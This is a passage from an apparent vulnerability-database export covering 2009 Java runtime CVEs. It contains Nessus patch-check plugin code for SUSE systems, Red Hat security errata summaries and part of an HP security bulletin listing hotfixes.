script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"IBMJava5-JRE-1.5.0-0.76\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"IBMJava5-SDK-1.5.0-0.76\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:22", "description": "java-1_5_0-sun u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.", "edition": 25, "published": "2009-11-11T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-11T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-src", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin"], "id": "SUSE_11_1_JAVA-1_5_0-SUN-091109.NASL", "href": "https://www.tenable.com/plugins/nessus/42460", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-1529.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42460);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)\");\n script_summary(english:\"Check for the java-1_5_0-sun-1529 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"java-1_5_0-sun u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.\"\n );\n # http://cve.mitre.org/cve\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cve/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552581\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-alsa-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-devel-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-plugin-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-src-1.5.0_update22-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:47", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555", "CVE-2009-3867", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3874", "CVE-2009-3875"], "description": "The IBM 1.4.2 SR13-FP4 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes various vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-3555, CVE-2009-3867, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3874, CVE-2009-3875)\n\nFor the CVE-2009-3555 issue, this update disables renegotiation in the\nnon-default IBM JSSE2 provider for the Java Secure Socket Extension (JSSE)\ncomponent. The default JSSE provider is not updated with this fix. Refer to\nthe IBMJSSE2 Provider Reference Guide, linked to in the References, for\ninstructions on how to configure the IBM Java 2 Runtime Environment to use\nthe JSSE2 provider by default.\n\nWhen using the JSSE2 provider, unsafe renegotiation can be re-enabled using\nthe com.ibm.jsse2.renegotiate property. Refer to the following\nKnowledgebase article for details:\nhttp://kbase.redhat.com/faq/docs/DOC-20491\n\nWarning: Do not install these java-1.4.2-ibm packages for SAP alongside the\njava-1.4.2-ibm packages from the Red Hat Enterprise Linux Extras or\nSupplementary channels on the Red Hat Network. Doing so could cause your\nsystem to fail to update cleanly, among other possible problems.\n\nAll users of java-1.4.2-ibm for Red Hat Enterprise Linux 4 and 5 for SAP\nare advised to upgrade to these updated packages, which contain the IBM\n1.4.2 SR13-FP4 Java release. All running instances of IBM Java must be\nrestarted for this update to take effect.\n", "modified": "2017-09-08T12:08:08", "published": "2010-05-12T04:00:00", "id": "RHSA-2010:0408", "href": "https://access.redhat.com/errata/RHSA-2010:0408", "type": "redhat", "title": "(RHSA-2010:0408) Moderate: java-1.4.2-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:59", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.", "modified": "2017-09-08T12:08:19", "published": "2009-12-08T05:00:00", "id": "RHSA-2009:1647", "href": "https://access.redhat.com/errata/RHSA-2009:1647", "type": "redhat", "title": "(RHSA-2009:1647) Critical: java-1.5.0-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2009-12-07T05:00:00", "id": "RHSA-2009:1643", "href": "https://access.redhat.com/errata/RHSA-2009:1643", "type": "redhat", "title": "(RHSA-2009:1643) Critical: java-1.4.2-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0217", "CVE-2009-3555", "CVE-2009-3865", "CVE-2009-3866", "CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.6.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-0217, CVE-2009-3865, CVE-2009-3866,\nCVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872,\nCVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR7 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-09-08T11:55:41", "published": "2009-12-23T05:00:00", "id": "RHSA-2009:1694", "href": "https://access.redhat.com/errata/RHSA-2009:1694", "type": "redhat", "title": "(RHSA-2009:1694) Critical: java-1.6.0-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit. The Java Runtime Environment (JRE)\ncontains the software and tools that users need to run applications written\nusing the Java programming language.\n\nAn integer overflow flaw and buffer overflow flaws were found in the way\nthe JRE processed image files. An untrusted applet or application could use\nthese flaws to extend its privileges, allowing it to read and write local\nfiles, as well as to execute local applications with the privileges of the\nuser running the applet or application. (CVE-2009-3869, CVE-2009-3871,\nCVE-2009-3873, CVE-2009-3874)\n\nAn information leak was found in the JRE. An untrusted applet or\napplication could use this flaw to extend its privileges, allowing it to\nread and write local files, as well as to execute local applications with\nthe privileges of the user running the applet or application. (CVE-2009-3881)\n\nIt was discovered that the JRE still accepts certificates with MD2 hash\nsignatures, even though MD2 is no longer considered a cryptographically\nstrong algorithm. This could make it easier for an attacker to create a\nmalicious certificate that would be treated as trusted by the JRE. With\nthis update, the JRE disables the use of the MD2 algorithm inside\nsignatures by default. (CVE-2009-2409)\n\nA timing attack flaw was found in the way the JRE processed HMAC digests.\nThis flaw could aid an attacker using forged digital signatures to bypass\nauthentication checks. (CVE-2009-3875)\n\nTwo denial of service flaws were found in the JRE. These could be exploited\nin server-side application scenarios that process DER-encoded\n(Distinguished Encoding Rules) data. (CVE-2009-3876, CVE-2009-3877)\n\nAn information leak was found in the way the JRE handled color profiles. An\nattacker could use this flaw to discover the existence of files outside of\nthe color profiles directory. (CVE-2009-3728)\n\nA flaw in the JRE with passing arrays to the X11GraphicsDevice API was\nfound. An untrusted applet or application could use this flaw to access and\nmodify the list of supported graphics configurations. This flaw could also\nlead to sensitive information being leaked to unprivileged code.\n(CVE-2009-3879)\n\nIt was discovered that the JRE passed entire objects to the logging API.\nThis could lead to sensitive information being leaked to either untrusted\nor lower-privileged code from an attacker-controlled applet which has\naccess to the logging API and is therefore able to manipulate (read and/or\ncall) the passed objects. (CVE-2009-3880)\n\nPotential information leaks were found in various mutable static variables.\nThese could be exploited in application scenarios that execute untrusted\nscripting code. (CVE-2009-3882, CVE-2009-3883)\n\nAn information leak was found in the way the TimeZone.getTimeZone method\nwas handled. This method could load time zone files that are outside of the\n[JRE_HOME]/lib/zi/ directory, allowing a remote attacker to probe the local\nfile system. (CVE-2009-3884)\n\nNote: The flaws concerning applets in this advisory, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3873, CVE-2009-3874, CVE-2009-3879, CVE-2009-3880,\nCVE-2009-3881 and CVE-2009-3884, can only be triggered in\njava-1.6.0-openjdk by calling the \"appletviewer\" application.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.", "modified": "2017-09-08T12:07:09", "published": "2009-11-16T05:00:00", "id": "RHSA-2009:1584", "href": "https://access.redhat.com/errata/RHSA-2009:1584", "type": "redhat", "title": "(RHSA-2009:1584) Important: java-1.6.0-openjdk security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The Sun 1.5.0 Java release includes the Sun Java 5 Runtime Environment and\nthe Sun Java 5 Software Development Kit.\n\nThis update fixes several vulnerabilities in the Sun Java 5 Runtime\nEnvironment and the Sun Java 5 Software Development Kit. These\nvulnerabilities are summarized on the \"Advance notification of Security\nUpdates for Java SE\" page from Sun Microsystems, listed in the References\nsection. (CVE-2009-2409, CVE-2009-3728, CVE-2009-3873, CVE-2009-3876,\nCVE-2009-3877, CVE-2009-3879, CVE-2009-3880, CVE-2009-3881, CVE-2009-3882,\nCVE-2009-3883, CVE-2009-3884)\n\nNote: This is the final update for the java-1.5.0-sun packages, as the Sun\nJava SE Release family 5.0 has now reached End of Service Life. The next\nupdate will remove the java-1.5.0-sun packages.\n\nAn alternative to Sun Java SE 5.0 is the Java 2 Technology Edition of the\nIBM Developer Kit for Linux, which is available from the Extras and\nSupplementary channels on the Red Hat Network. For users of applications\nthat are capable of using the Java 6 runtime, the OpenJDK open source JDK\nis included in Red Hat Enterprise Linux 5 (since 5.3) and is supported by\nRed Hat.\n\nUsers of java-1.5.0-sun should upgrade to these updated packages, which\ncorrect these issues. All running instances of Sun Java must be restarted\nfor the update to take effect.", "modified": "2017-07-27T02:00:51", "published": "2009-11-10T05:00:00", "id": "RHSA-2009:1571", "href": "https://access.redhat.com/errata/RHSA-2009:1571", "type": "redhat", "title": "(RHSA-2009:1571) Critical: java-1.5.0-sun security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:13", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3729", "CVE-2009-3865", "CVE-2009-3866", "CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884", "CVE-2009-3886"], "description": "The Sun 1.6.0 Java release includes the Sun Java 6 Runtime Environment and\nthe Sun Java 6 Software Development Kit.\n\nThis update fixes several vulnerabilities in the Sun Java 6 Runtime\nEnvironment and the Sun Java 6 Software Development Kit. These\nvulnerabilities are summarized on the \"Advance notification of Security\nUpdates for Java SE\" page from Sun Microsystems, listed in the References\nsection. (CVE-2009-2409, CVE-2009-3728, CVE-2009-3729, CVE-2009-3865,\nCVE-2009-3866, CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871,\nCVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876,\nCVE-2009-3877, CVE-2009-3879, CVE-2009-3880, CVE-2009-3881, CVE-2009-3882,\nCVE-2009-3883, CVE-2009-3884, CVE-2009-3886)\n\nUsers of java-1.6.0-sun should upgrade to these updated packages, which\ncorrect these issues. All running instances of Sun Java must be restarted\nfor the update to take effect.", "modified": "2017-07-27T02:00:37", "published": "2009-11-09T05:00:00", "id": "RHSA-2009:1560", "href": "https://access.redhat.com/errata/RHSA-2009:1560", "type": "redhat", "title": "(RHSA-2009:1560) Critical: java-1.6.0-sun security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "No description provided", "edition": 1, "modified": "2011-09-20T00:00:00", "published": "2011-09-20T00:00:00", "id": "SECURITYVULNS:VULN:11915", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11915", "title": "HP Network Node Manager i DoS", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03005726\r\nVersion: 1\r\n\r\nHPSBMU02703 SSRT100242 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Disclosure of Information, Unauthorized Modification\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-09-12\r\nLast Updated: 2011-09-12\r\n\r\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized disclosure of information, unauthorized modification\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS), unauthorized disclosure of information, and unauthorized modification.\r\n\r\nReferences: CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Network Node Manager i (NNMi) v8.1x and v9.0x for HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-3867 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3868 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3869 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3871 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3872 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3873 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3874 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3875 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\r\nCVE-2009-3876 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2009-3877 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made a hotfixes available to resolve these vulnerabilities for NNMi v9.0x and NNMi v8.1x. The hotfixes can be obtained by contacting the normal HP Services support channel.\r\n\r\nFor NNMi 9.0x\r\n\r\nOperating System\r\n Hotfix Identifier\r\n\r\nHP-UX\r\n QCCR1B90090\r\n\r\nLinux\r\n QCCR1B90091\r\n\r\nSolaris\r\n QCCR1B90092\r\n\r\nWindows\r\n QCCR1B90093\r\n\r\nNNMi v9.0x Required Patches\r\n\r\nNote: Before installing the hotfix on NNMi v9.0x insure that the following patches have been installed.\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX\r\n PHSS_41982\r\n\r\nLinux\r\n NNM900L_00004\r\n\r\nSolaris\r\n NNM900S_00004\r\n\r\nWindows\r\n NNM900W_00004\r\n\r\nFor NNMi 8.1x\r\n\r\nNNMi Version\r\n Hotfix Identifier\r\n\r\nNNMi v8.1x\r\n QCCR1B45223\r\n\r\nNNMi v8.1x Required Patches\r\n\r\nNote: Before installing the hotfix on NNMi v8.1x insure that the following patches have been installed.\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX\r\n PHSS_41147\r\n\r\nLinux\r\n NNM810L_00009\r\n\r\nSolaris\r\n NNM810S_00009\r\n\r\nWindows\r\n NNM810W_00009\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\n\r\nInstall appropriate hotfix after installing the required patch.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nFor HP-UX NNMi v9.0x\r\n\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\n=============\r\nHPOvNNM.HPNMSJBOSS\r\naction: install the QCCR1B90090 hotfix after installing the required patch\r\n\r\nFor HP-UX NNMi v8.1x\r\n\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\n=============\r\nHPOvNNM.HPNMSJBOSS\r\naction: install the QCCR1B45223 hotfix after installing the required patch\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 12 September 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: 